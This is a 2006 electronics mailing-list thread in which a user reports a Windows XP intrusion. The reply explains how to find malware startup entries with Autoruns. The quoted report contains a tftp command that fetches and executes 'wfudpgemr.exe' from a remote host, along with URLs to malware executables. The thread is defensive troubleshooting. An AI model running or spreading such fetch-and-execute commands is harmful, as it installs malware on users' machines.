Check your "autoruns" using autoruns from sysinternals.
http://www.sysinternals.com/Utilities/Autoruns.html This is the list, in
case you don't know, that windows activates when it starts, and is an easy
way for malware to get itself started again when you reboot. Since this
means the malware does not need to modify an existing .exe to get started,
it will NOT appear on most anti-virus scans. Adaware does a better job of
catching these automatically, but I find that getting to know the autoruns
is a better way of combating the problem.

This has more info on your bad .exe
http://fileinfo.prevx.com/adware/qq276a42612891-WFUD25104328/WFUDPGEMR.EXE.h
tml

"WFUDPGEMR.EXE may use 5 or more path and file names, these are the most
common:
1 :%TEMP%\DHAYZLAUKX.EXE
2 :%WINDIR%\SYSTEM32\WFUDPGEMR1234.EXE"

Each of those may be listed in your autoruns.

Please DO keep us posted? I'm very interested to know what you find.

---
James.
 




> -----Original Message-----
> From: piclist-bounces@mit.edu 
> [mailto:piclist-bounces@mit.edu] On Behalf Of Carey Fisher - NCS
> Sent: 2006 Oct 05, Thu 11:43
> To: Microcontroller discussion list - Public.
> Subject: [EE]: WINXP Malware Attacks? CAUTION - POSSIBLE BAD 
> LINKS LISTED
> 
> Today, as I was sitting at my WINXP machine working, the 
> START/Run window popped open and some unknown force typed the 
> following:
> 
> http://homepage.my-place.us/system.exe
> 
> Well, I immediately disabled the network connection and I 
> don't think this program was executed.
> 
> Then I scrolled through the Run window and found the 
> following 3 lines:
> 
> cmd /c tftp -i 10.0.6.28 GET wfudpgemr.exe &wfudpgemr.exe 
> &exit http://kruma.us/vn.exe %SYSTEMROOT%\SYSTEM32\CMD.EXE
> 
> This really surprised me since I've taken a lot of measures 
> to secure my system including a program that won't let new 
> programs run without my permission.   This is why the first 
> one didn't run.  I also run antivirus, I monitor the 
> router/firewall with 
> Wallwatcher, and I block all inbound ports except a couple 
> (Skype, FreeVNC).
> 
> Anybody know anything about any of these apparent attacks.  
> Any suggestions to prevent this particular exploit (START/Run)?
> 
> Thanks,
> Carey
> --
> http://www.piclist.com PIC/SX FAQ & list archive View/change 
> your membership options at 
> http://mailman.mit.edu/mailman/listinfo/piclist

-- 
http://www.piclist.com PIC/SX FAQ & list archive
View/change your membership options at
http://mailman.mit.edu/mailman/listinfo/piclist